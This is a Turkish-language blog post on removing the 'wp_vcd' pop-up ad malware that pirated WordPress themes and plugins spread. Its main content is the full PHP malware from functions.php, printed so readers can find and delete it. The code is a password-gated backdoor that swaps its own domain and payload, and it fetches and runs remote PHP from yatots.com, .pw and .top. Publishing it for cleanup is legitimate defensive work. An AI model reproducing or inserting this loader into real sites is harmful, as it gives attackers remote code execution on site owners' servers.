Wordpress

WordPress Pop-Up Reklam Virüsü

Wordpress Pop-Up Virüsü Nasıl Temizlemir?

Herkese merhabalar WordPress tabanlı sitelere w@rez wordpress eklentilerinden, temalarından çok kolay bir şekilde reklam virüsü bulaşabiliyor. Bu yazımızda pop-up reklam virüsü temizleme hakkında tamamen kesin çözüm vereceğiz…

Wordpress Pop-Up Temizleme Nasıl Yapılır?

WordPress Pop-Up Temizleme Nasıl Yapılır?

WordPress reklam virüsü, yüklediğiniz eklentilerden veya temalardan kaynaklı olmasıyla birlikte sitenizin başkaları tarafından da eklenebiliyor. WordPress tabanlı sitenizde bulunan  WordPress pop-up reklam virüsü sitenize bir kere bulaşıyor, ardından tema dosyalarının içinde bulunan function.php dosyasının içerisine ve wp-includes klasörünün içine wp-tmp.php ve wp-vcd.php olarak kendini kopyalıyor. Böylece temanızı değiştirseniz de kullandığınız eklentileri kaldırsanız da bu virüs hiçbir şekilde kalkmayacaktır.

Pop-Up Reklamı Temizleme Nasıl Yapılır?

Sitenizde bulunan bu illet virüsten kurtulmanız oldukça basit… Öncelikle FTP’ye yada CPanel aracılığıyla dosyalarınıza erişim sağlayın. Ardından public_html > /wp-includes   dosyasına girip wp-tmp.php ve wp-vcd.php dosyalarını klasörden silin. Ve son olarak da public_html > wp-includes > themes > temanız > functions.php dosyasına girin ve aşağıdaki verdiğim kodu tamamen dosyanın içinden silin. (dosyanın yedeğini almayı unutmayın)

Not: Aşağıdaki kodlar herkeste farklılık gösterebilir.

[php]

<?php
if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘f84f27418f263eda171e1ae83e6cbf76’))
{
$div_code_name="wp_vcd";
switch ($_REQUEST[‘action’])
{

case ‘change_domain’;
if (isset($_REQUEST[‘newdomain’]))
{

if (!empty($_REQUEST[‘newdomain’]))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all(‘/$tmpcontent = @file_get_contents("http://(.*)/code.php/i’,$file,$matcholddomain))
{

$file = preg_replace(‘/’.$matcholddomain[1][0].’/i’,$_REQUEST[‘newdomain’], $file);
@file_put_contents(__FILE__, $file);
print "true";
}

}
}
}
break;

case ‘change_code’;
if (isset($_REQUEST[‘newcode’]))
{

if (!empty($_REQUEST[‘newcode’]))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all(‘///$start_wp_theme_tmp([sS]*)//$end_wp_theme_tmp/i’,$file,$matcholdcode))
{

$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST[‘newcode’]), $file);
@file_put_contents(__FILE__, $file);
print "true";
}

}
}
}
break;

default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}

die("");
}

$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if(!function_exists(‘theme_temp_setup’)) {
$path = $_SERVER[‘HTTP_HOST’] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) == false) {

function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}

function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
if( fwrite($handle, "<?phpn" . $phpCode))
{
}
else
{
$tmpfname = tempnam(‘./’, "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?phpn" . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}

$wp_auth_key=’8b5ee9d5a643d0b9ec0bc71484793086′;
if (($tmpcontent = @file_get_contents("http://www.yatots.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.yatots.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);

if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
@file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
@file_put_contents(‘wp-tmp.php’, $tmpcontent);
}
}

}
}

elseif ($tmpcontent = @file_get_contents("http://www.yatots.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);

if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
@file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
@file_put_contents(‘wp-tmp.php’, $tmpcontent);
}
}

}
}

elseif ($tmpcontent = @file_get_contents("http://www.yatots.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);

if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
@file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
@file_put_contents(‘wp-tmp.php’, $tmpcontent);
}
}

}
}
elseif ($tmpcontent = @file_get_contents(ABSPATH . ‘wp-includes/wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents(get_template_directory() . ‘/wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents(‘wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

}

}
}

//$start_wp_theme_tmp

//wp_tmp

//$end_wp_theme_tmp
?>
<pre>[/php]

1 Comment

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

This site uses Akismet to reduce spam. Learn how your comment data is processed.